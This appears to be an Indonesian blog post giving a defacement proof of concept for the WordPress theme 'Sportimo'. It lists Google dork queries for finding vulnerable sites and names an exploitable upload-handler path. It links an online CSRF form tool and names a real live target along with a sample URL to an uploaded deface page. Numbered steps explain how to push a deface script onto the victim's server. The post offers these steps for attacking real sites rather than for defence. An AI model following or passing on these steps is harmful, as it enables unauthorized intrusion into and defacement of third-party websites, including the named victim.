Follow Us

Deface PoC Exploit Wordpress Themes Sportimo

#Google Dork :
- inurl:/wp-content/themes/sportimo-theme/
- index of /wp-content/themes/sportimo-theme/
#Exploit : /wp-content/themes/sportimo-theme/functions/upload-handler.php
#Csrf Online : https://www.hexsploit.web.id/?tools=csrf
#Live Target : http://ichd.ma

1. Dorking dulu bre...
2. Pilih salah satu target lalu masukkan exploitnya jika ada tulisan error atau seperti ini tandanya vuln

3. Lalu kalian menuju CSRF nya dan url isi dengan target beserta exploitnya, post file nya diisi dengan orange_themes 
4. Lalu kalian kunci dan upload sc kalian, jika terupload akan seperti ini, 404.html adalah nama script deface saya
5. Akses nya begini target.com/wp-content/uploads/tahun/bulan/sckalian.html
contoh : http://ichd.ma/wp-content/uploads/2020/03/404.html

Post a Comment

0 Comments